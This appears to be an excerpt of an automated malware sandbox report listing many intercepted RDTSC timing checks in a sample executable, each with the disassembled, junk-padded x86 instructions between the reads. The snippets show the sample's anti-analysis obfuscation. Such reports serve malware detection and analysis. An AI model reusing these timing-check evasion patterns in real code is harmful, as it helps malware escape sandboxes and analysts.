                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D300E4 second address: 4D3016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0EC450201Eh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F0EC4502020h 0x00000018 push dword ptr [ebp+04h] 0x0000001b jmp 00007F0EC4502020h 0x00000020 push dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 mov ax, 574Dh 0x00000028 mov edx, esi 0x0000002a popad 0x0000002b push dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F0EC4502021h 0x00000037 or ecx, 73E2D5D6h 0x0000003d jmp 00007F0EC4502021h 0x00000042 popfd 0x00000043 movzx ecx, di 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50BAF second address: 4D50BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50BB3 second address: 4D50BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50BB9 second address: 4D50BE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 jmp 00007F0EC4CB7FD8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50BE0 second address: 4D50C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e pushfd 0x0000000f jmp 00007F0EC450201Ah 0x00000014 or esi, 733D4B28h 0x0000001a jmp 00007F0EC450201Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007F0EC4502026h 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0EC450201Ah 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50C44 second address: 4D50C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50795 second address: 4D507D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0EC450201Fh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F0EC4502022h 0x00000012 push eax 0x00000013 pushad 0x00000014 mov ax, 4253h 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F0EC450201Eh 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D507D8 second address: 4D507DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D507DE second address: 4D507E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506D1 second address: 4D506F2 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0EC4CB7FD2h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506F2 second address: 4D506F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506F6 second address: 4D506FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506FC second address: 4D50702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50702 second address: 4D5073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0EC4CB7FD3h 0x00000010 jmp 00007F0EC4CB7FD3h 0x00000015 popfd 0x00000016 mov dh, al 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50352 second address: 4D50358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50358 second address: 4D5035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D5035C second address: 4D503E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F0EC450201Fh 0x0000000f call 00007F0EC4502028h 0x00000014 mov ah, 7Fh 0x00000016 pop ebx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov ch, 6Fh 0x0000001d mov si, bx 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F0EC4502028h 0x0000002b and ax, D3B8h 0x00000030 jmp 00007F0EC450201Bh 0x00000035 popfd 0x00000036 call 00007F0EC4502028h 0x0000003b pop esi 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D60275 second address: 4D6027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6027B second address: 4D6029B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6029B second address: 4D6029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6029F second address: 4D602BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D602BA second address: 4D60309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007F0EC4CB7FD0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movsx edx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F0EC4CB7FD8h 0x0000001b jmp 00007F0EC4CB7FD5h 0x00000020 popfd 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D60309 second address: 4D6033E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC4502020h 0x00000008 jmp 00007F0EC4502025h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ah, bh 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6033E second address: 4D6037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push ecx 0x00000011 mov di, 53A8h 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0EC4CB7FD6h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6037C second address: 4D60380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D60380 second address: 4D60386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90F66 second address: 4D90F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90F6C second address: 4D90F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90F70 second address: 4D90F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70464 second address: 4D70515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F0EC4CB7FD1h 0x0000000b sbb ax, 3446h 0x00000010 jmp 00007F0EC4CB7FD1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c jmp 00007F0EC4CB7FCCh 0x00000021 pushfd 0x00000022 jmp 00007F0EC4CB7FD2h 0x00000027 add esi, 74627C18h 0x0000002d jmp 00007F0EC4CB7FCBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp+08h] 0x00000037 jmp 00007F0EC4CB7FD6h 0x0000003c and dword ptr [eax], 00000000h 0x0000003f pushad 0x00000040 call 00007F0EC4CB7FCEh 0x00000045 mov ah, C0h 0x00000047 pop edx 0x00000048 movzx ecx, di 0x0000004b popad 0x0000004c and dword ptr [eax+04h], 00000000h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0EC4CB7FD1h 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70515 second address: 4D7051B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D7051B second address: 4D70532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70532 second address: 4D70536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50575 second address: 4D505C6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC4CB7FD8h 0x00000008 xor ecx, 72DF3508h 0x0000000e jmp 00007F0EC4CB7FCBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 mov edx, eax 0x00000019 push eax 0x0000001a pop edx 0x0000001b popad 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0EC4CB7FD6h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D505C6 second address: 4D505D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D505D5 second address: 4D5064B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F0EC4CB7FD7h 0x00000010 pushfd 0x00000011 jmp 00007F0EC4CB7FD8h 0x00000016 or cx, DE88h 0x0000001b jmp 00007F0EC4CB7FCBh 0x00000020 popfd 0x00000021 pop esi 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F0EC4CB7FCBh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D5064B second address: 4D5064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D5064F second address: 4D50655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D700AB second address: 4D700C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D700C2 second address: 4D700C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70286 second address: 4D702F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F0EC4502020h 0x0000000b or si, AA08h 0x00000010 jmp 00007F0EC450201Bh 0x00000015 popfd 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F0EC4502026h 0x0000001f mov ebp, esp 0x00000021 jmp 00007F0EC4502020h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0EC4502027h 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D702F3 second address: 4D702F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D9072B second address: 4D9073C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D9073C second address: 4D90740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90740 second address: 4D90751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90751 second address: 4D9077C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D9077C second address: 4D90780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90780 second address: 4D90786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90786 second address: 4D907F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov edi, 147A0E10h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007F0EC4502024h 0x00000013 mov dword ptr [esp], ecx 0x00000016 pushad 0x00000017 call 00007F0EC450201Eh 0x0000001c call 00007F0EC4502022h 0x00000021 pop eax 0x00000022 pop ebx 0x00000023 mov si, 15F7h 0x00000027 popad 0x00000028 mov eax, dword ptr [775165FCh] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F0EC4502029h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D907F3 second address: 4D90820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov esi, 1649CA63h 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 je 00007F0F373BB119h 0x0000001a pushad 0x0000001b mov edi, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ch, 88h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90820 second address: 4D908C8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC450201Fh 0x00000008 sbb ax, B93Eh 0x0000000d jmp 00007F0EC4502029h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ecx, eax 0x00000018 pushad 0x00000019 mov ax, 1223h 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 popad 0x00000022 xor eax, dword ptr [ebp+08h] 0x00000025 jmp 00007F0EC4502021h 0x0000002a and ecx, 1Fh 0x0000002d pushad 0x0000002e push eax 0x0000002f mov bh, D3h 0x00000031 pop eax 0x00000032 call 00007F0EC4502025h 0x00000037 pop ecx 0x00000038 popad 0x00000039 ror eax, cl 0x0000003b pushad 0x0000003c mov ch, bh 0x0000003e pushfd 0x0000003f jmp 00007F0EC4502022h 0x00000044 add esi, 5EAE6228h 0x0000004a jmp 00007F0EC450201Bh 0x0000004f popfd 0x00000050 popad 0x00000051 leave 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push edx 0x00000056 pop ecx 0x00000057 mov cx, di 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D908C8 second address: 4D90905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F0EC4CB7FD2h 0x0000000b add cx, AFB8h 0x00000010 jmp 00007F0EC4CB7FCBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 retn 0004h 0x0000001c nop 0x0000001d mov esi, eax 0x0000001f lea eax, dword ptr [ebp-08h] 0x00000022 xor esi, dword ptr [00B62014h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e push eax 0x0000002f call 00007F0EC8F287FDh 0x00000034 push FFFFFFFEh 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov edx, 33FA6BA6h 0x0000003e mov si, di 0x00000041 popad 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90905 second address: 4D909B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0EC4502026h 0x00000009 or cx, 8948h 0x0000000e jmp 00007F0EC450201Bh 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop eax 0x0000001b jmp 00007F0EC450201Bh 0x00000020 ret 0x00000021 nop 0x00000022 push eax 0x00000023 call 00007F0EC8772892h 0x00000028 mov edi, edi 0x0000002a jmp 00007F0EC4502026h 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F0EC4502020h 0x00000035 push eax 0x00000036 pushad 0x00000037 mov si, di 0x0000003a push ebx 0x0000003b pushfd 0x0000003c jmp 00007F0EC4502028h 0x00000041 adc al, 00000068h 0x00000044 jmp 00007F0EC450201Bh 0x00000049 popfd 0x0000004a pop ecx 0x0000004b popad 0x0000004c xchg eax, ebp 0x0000004d jmp 00007F0EC450201Fh 0x00000052 mov ebp, esp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D909B4 second address: 4D909B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D909B8 second address: 4D909BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D909BE second address: 4D90A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0EC4CB7FD8h 0x00000008 pushfd 0x00000009 jmp 00007F0EC4CB7FD2h 0x0000000e sub cl, 00000058h 0x00000011 jmp 00007F0EC4CB7FCBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0EC4CB7FD5h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90A16 second address: 4D90A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90A1C second address: 4D90A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D4002A second address: 4D400A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502026h 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov al, 01h 0x0000000e pushfd 0x0000000f jmp 00007F0EC4502023h 0x00000014 sbb esi, 1A162CEEh 0x0000001a jmp 00007F0EC4502029h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 call 00007F0EC450201Ch 0x00000029 call 00007F0EC4502022h 0x0000002e pop ecx 0x0000002f pop edi 0x00000030 push eax 0x00000031 push edx 0x00000032 movzx eax, bx 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D400A6 second address: 4D400F3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC4CB7FD3h 0x00000008 sub al, 0000005Eh 0x0000000b jmp 00007F0EC4CB7FD9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 jmp 00007F0EC4CB7FCEh 0x0000001c xchg eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D400F3 second address: 4D400FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, si 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D400FB second address: 4D40101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40101 second address: 4D40105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40105 second address: 4D40171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0EC4CB7FD8h 0x00000010 xor esi, 67463DE8h 0x00000016 jmp 00007F0EC4CB7FCBh 0x0000001b popfd 0x0000001c mov ch, F1h 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007F0EC4CB7FCBh 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F0EC4CB7FD6h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0EC4CB7FCEh 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D40171 second address: 4D40177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
